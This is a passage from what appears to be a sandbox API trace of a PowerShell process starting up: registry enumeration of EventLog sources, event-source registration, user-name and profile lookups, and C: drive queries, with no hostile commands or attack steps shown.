RegOpenKeyExW (in: hKey=0x438, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x0) returned 0x2 [0181.839] RegCloseKey (hKey=0x438) returned 0x0 [0181.839] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x438) returned 0x0 [0181.839] RegOpenKeyExW (in: hKey=0x438, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f3a8 | out: phkResult=0x7c2f3a8*=0x678) returned 0x0 [0181.839] RegCloseKey (hKey=0x678) returned 0x0 [0181.839] RegCloseKey (hKey=0x378) returned 0x0 [0181.840] RegCloseKey (hKey=0x438) returned 0x0 [0182.042] CoTaskMemAlloc (cb=0x804) returned 0x7625798 [0182.042] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7625798, nSize=0x7c2f4a0 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x7c2f4a0) returned 0x1 [0182.047] CoTaskMemFree (pv=0x7625798) [0182.048] GetUserNameW (in: lpBuffer=0x7c2f234, pcbBuffer=0x7c2f4ac | out: lpBuffer="FD1HVy", pcbBuffer=0x7c2f4ac) returned 1 [0183.631] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f350 | out: phkResult=0x7c2f350*=0x690) returned 0x0 [0183.633] RegQueryInfoKeyW (in: hKey=0x690, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x7c2f3a0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x7c2f39c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x7c2f3a0*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x7c2f39c*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.633] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x0, lpName=0x5437694, lpcchName=0x7c2f3bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x7c2f3bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.633] CoTaskMemFree (pv=0x0) [0183.633] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x1, lpName=0x5437694, lpcchName=0x7c2f3bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x7c2f3bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.633] CoTaskMemFree (pv=0x0) [0183.633] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x2, lpName=0x5437694, lpcchName=0x7c2f3bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x7c2f3bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.633] CoTaskMemFree (pv=0x0) [0183.634] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x3, lpName=0x5437694, lpcchName=0x7c2f3bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x7c2f3bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.634] CoTaskMemFree (pv=0x0) [0183.634] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x4, lpName=0x5437694, lpcchName=0x7c2f3bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x7c2f3bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.634] CoTaskMemFree (pv=0x0) [0183.634] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x5, lpName=0x5437694, lpcchName=0x7c2f3bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x7c2f3bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.634] CoTaskMemFree (pv=0x0) [0183.634] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x6, lpName=0x5437694, lpcchName=0x7c2f3bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x7c2f3bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.634] CoTaskMemFree (pv=0x0) [0183.634] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x7, lpName=0x5437694, lpcchName=0x7c2f3bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x7c2f3bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.634] CoTaskMemFree (pv=0x0) [0183.634] RegOpenKeyExW (in: hKey=0x690, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x694) returned 0x0 [0183.634] RegOpenKeyExW (in: hKey=0x694, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x0) returned 0x2 [0183.635] RegCloseKey (hKey=0x694) returned 0x0 [0183.635] RegOpenKeyExW (in: hKey=0x690, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x694) returned 0x0 [0183.635] RegOpenKeyExW (in: hKey=0x694, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x0) returned 0x2 [0183.635] RegCloseKey (hKey=0x694) returned 0x0 [0183.635] RegOpenKeyExW (in: hKey=0x690, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x694) returned 0x0 [0183.635] RegOpenKeyExW (in: hKey=0x694, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x0) returned 0x2 [0183.635] RegCloseKey (hKey=0x694) returned 0x0 [0183.636] RegOpenKeyExW (in: hKey=0x690, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x694) returned 0x0 [0183.636] RegOpenKeyExW (in: hKey=0x694, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x0) returned 0x2 [0183.636] RegCloseKey (hKey=0x694) returned 0x0 [0183.636] RegOpenKeyExW (in: hKey=0x690, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x694) returned 0x0 [0183.636] RegOpenKeyExW (in: hKey=0x694, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x0) returned 0x2 [0183.636] RegCloseKey (hKey=0x694) returned 0x0 [0183.638] RegOpenKeyExW (in: hKey=0x690, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x694) returned 0x0 [0183.638] RegOpenKeyExW (in: hKey=0x694, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x0) returned 0x2 [0183.638] RegCloseKey (hKey=0x694) returned 0x0 [0183.638] RegOpenKeyExW (in: hKey=0x690, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x694) returned 0x0 [0183.638] RegOpenKeyExW (in: hKey=0x694, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x0) returned 0x2 [0183.638] RegCloseKey (hKey=0x694) returned 0x0 [0183.638] RegOpenKeyExW (in: hKey=0x690, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x694) returned 0x0 [0183.639] RegOpenKeyExW (in: hKey=0x694, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f37c | out: phkResult=0x7c2f37c*=0x698) returned 0x0 [0183.639] RegCloseKey (hKey=0x698) returned 0x0 [0183.639] RegCloseKey (hKey=0x690) returned 0x0 [0183.640] RegCloseKey (hKey=0x694) returned 0x0 [0183.641] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f35c | out: phkResult=0x7c2f35c*=0x694) returned 0x0 [0183.642] RegQueryInfoKeyW (in: hKey=0x694, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x7c2f3ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x7c2f3a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x7c2f3ac*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x7c2f3a8*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.642] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x0, lpName=0x54386a0, lpcchName=0x7c2f3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x7c2f3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.642] CoTaskMemFree (pv=0x0) [0183.642] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x1, lpName=0x54386a0, lpcchName=0x7c2f3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x7c2f3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.642] CoTaskMemFree (pv=0x0) [0183.642] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x2, lpName=0x54386a0, lpcchName=0x7c2f3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x7c2f3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.642] CoTaskMemFree (pv=0x0) [0183.642] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x3, lpName=0x54386a0, lpcchName=0x7c2f3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x7c2f3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.642] CoTaskMemFree (pv=0x0) [0183.643] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x4, lpName=0x54386a0, lpcchName=0x7c2f3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x7c2f3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.643] CoTaskMemFree (pv=0x0) [0183.643] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x5, lpName=0x54386a0, lpcchName=0x7c2f3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x7c2f3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.643] CoTaskMemFree (pv=0x0) [0183.643] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x6, lpName=0x54386a0, lpcchName=0x7c2f3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x7c2f3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.643] CoTaskMemFree (pv=0x0) [0183.643] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x7, lpName=0x54386a0, lpcchName=0x7c2f3c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x7c2f3c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.643] CoTaskMemFree (pv=0x0) [0183.643] RegOpenKeyExW (in: hKey=0x694, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x690) returned 0x0 [0183.643] RegOpenKeyExW (in: hKey=0x690, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x0) returned 0x2 [0183.643] RegCloseKey (hKey=0x690) returned 0x0 [0183.643] RegOpenKeyExW (in: hKey=0x694, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x690) returned 0x0 [0183.644] RegOpenKeyExW (in: hKey=0x690, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x0) returned 0x2 [0183.644] RegCloseKey (hKey=0x690) returned 0x0 [0183.644] RegOpenKeyExW (in: hKey=0x694, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x690) returned 0x0 [0183.644] RegOpenKeyExW (in: hKey=0x690, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x0) returned 0x2 [0183.644] RegCloseKey (hKey=0x690) returned 0x0 [0183.644] RegOpenKeyExW (in: hKey=0x694, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x690) returned 0x0 [0183.644] RegOpenKeyExW (in: hKey=0x690, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x0) returned 0x2 [0183.644] RegCloseKey (hKey=0x690) returned 0x0 [0183.645] RegOpenKeyExW (in: hKey=0x694, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x690) returned 0x0 [0183.645] RegOpenKeyExW (in: hKey=0x690, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x0) returned 0x2 [0183.645] RegCloseKey (hKey=0x690) returned 0x0 [0183.645] RegOpenKeyExW (in: hKey=0x694, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x690) returned 0x0 [0183.645] RegOpenKeyExW (in: hKey=0x690, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x0) returned 0x2 [0183.645] RegCloseKey (hKey=0x690) returned 0x0 [0183.645] RegOpenKeyExW (in: hKey=0x694, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x690) returned 0x0 [0183.646] RegOpenKeyExW (in: hKey=0x690, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x0) returned 0x2 [0183.646] RegCloseKey (hKey=0x690) returned 0x0 [0183.646] RegOpenKeyExW (in: hKey=0x694, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x690) returned 0x0 [0183.646] RegOpenKeyExW (in: hKey=0x690, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f388 | out: phkResult=0x7c2f388*=0x698) returned 0x0 [0183.646] RegCloseKey (hKey=0x698) returned 0x0 [0183.646] RegCloseKey (hKey=0x694) returned 0x0 [0183.648] RegCloseKey (hKey=0x690) returned 0x0 [0183.649] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f344 | out: phkResult=0x7c2f344*=0x694) returned 0x0 [0183.853] RegQueryInfoKeyW (in: hKey=0x694, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x7c2f394, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x7c2f390, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x7c2f394*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x7c2f390*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.853] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x0, lpName=0x544848c, lpcchName=0x7c2f3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x7c2f3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.853] CoTaskMemFree (pv=0x0) [0183.854] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x1, lpName=0x544848c, lpcchName=0x7c2f3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x7c2f3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.854] CoTaskMemFree (pv=0x0) [0183.854] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x2, lpName=0x544848c, lpcchName=0x7c2f3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x7c2f3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.854] CoTaskMemFree (pv=0x0) [0183.854] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x3, lpName=0x544848c, lpcchName=0x7c2f3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x7c2f3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.854] CoTaskMemFree (pv=0x0) [0183.854] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x4, lpName=0x544848c, lpcchName=0x7c2f3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x7c2f3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.854] CoTaskMemFree (pv=0x0) [0183.854] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x5, lpName=0x544848c, lpcchName=0x7c2f3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x7c2f3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.854] CoTaskMemFree (pv=0x0) [0183.854] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x6, lpName=0x544848c, lpcchName=0x7c2f3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x7c2f3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.854] CoTaskMemFree (pv=0x0) [0183.854] RegEnumKeyExW (in: hKey=0x694, dwIndex=0x7, lpName=0x544848c, lpcchName=0x7c2f3b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x7c2f3b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0183.854] CoTaskMemFree (pv=0x0) [0183.854] RegOpenKeyExW (in: hKey=0x694, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x698) returned 0x0 [0183.854] RegOpenKeyExW (in: hKey=0x698, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x0) returned 0x2 [0183.854] RegCloseKey (hKey=0x698) returned 0x0 [0183.854] RegOpenKeyExW (in: hKey=0x694, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x698) returned 0x0 [0183.855] RegOpenKeyExW (in: hKey=0x698, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x0) returned 0x2 [0183.855] RegCloseKey (hKey=0x698) returned 0x0 [0183.855] RegOpenKeyExW (in: hKey=0x694, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x698) returned 0x0 [0183.855] RegOpenKeyExW (in: hKey=0x698, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x0) returned 0x2 [0183.855] RegCloseKey (hKey=0x698) returned 0x0 [0183.855] RegOpenKeyExW (in: hKey=0x694, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x698) returned 0x0 [0183.855] RegOpenKeyExW (in: hKey=0x698, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x0) returned 0x2 [0183.855] RegCloseKey (hKey=0x698) returned 0x0 [0183.855] RegOpenKeyExW (in: hKey=0x694, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x698) returned 0x0 [0183.855] RegOpenKeyExW (in: hKey=0x698, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x0) returned 0x2 [0183.856] RegCloseKey (hKey=0x698) returned 0x0 [0183.856] RegOpenKeyExW (in: hKey=0x694, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x698) returned 0x0 [0183.856] RegOpenKeyExW (in: hKey=0x698, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x0) returned 0x2 [0183.856] RegCloseKey (hKey=0x698) returned 0x0 [0183.856] RegOpenKeyExW (in: hKey=0x694, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x698) returned 0x0 [0183.856] RegOpenKeyExW (in: hKey=0x698, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x0) returned 0x2 [0183.856] RegCloseKey (hKey=0x698) returned 0x0 [0183.856] RegOpenKeyExW (in: hKey=0x694, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x698) returned 0x0 [0183.856] RegOpenKeyExW (in: hKey=0x698, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c2f370 | out: phkResult=0x7c2f370*=0x69c) returned 0x0 [0183.856] RegCloseKey (hKey=0x69c) returned 0x0 [0183.856] RegCloseKey (hKey=0x694) returned 0x0 [0183.857] RegCloseKey (hKey=0x698) returned 0x0 [0183.897] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x7450004 [0183.929] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x5449298*="Registry", lpRawData=0x54491ac) returned 1 [0183.956] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x544b408*="Alias", lpRawData=0x544b330) returned 1 [0184.035] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x544d508*="Environment", lpRawData=0x544d430) returned 1 [0184.037] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x7c2f374, nSize=0x80 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0184.037] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x104, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0184.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c2f42c) returned 1 [0184.037] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy"), fInfoLevelId=0x0, lpFileInformation=0x7c2f4a8 | out: lpFileInformation=0x7c2f4a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0184.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c2f428) returned 1 [0184.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7c2ebd0, nSize=0x80 | out: lpBuffer="က澪က澪") returned 0x0 [0184.041] GetLogicalDrives () returned 0x4 [0184.046] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0184.046] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0184.046] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.049] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c2f418) returned 1 [0184.049] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x7c2f320, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x7c2f440, lpMaximumComponentLength=0x7c2f43c, lpFileSystemFlags=0x7c2f438, lpFileSystemNameBuffer=0x7c2f2b8, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x7c2f440*=0xb4197730, lpMaximumComponentLength=0x7c2f43c*=0xff, lpFileSystemFlags=0x7c2f438*=0x3e702ff, lpFileSystemNameBuffer="NTFS") returned 1 [0184.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c2f414) returned 1 [0184.050] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.050] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.050] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0184.050] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0184.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c2f3d0) returned 1 [0184.051] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x544e654 | out: lpFileInformation=0x544e654*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x865407b, 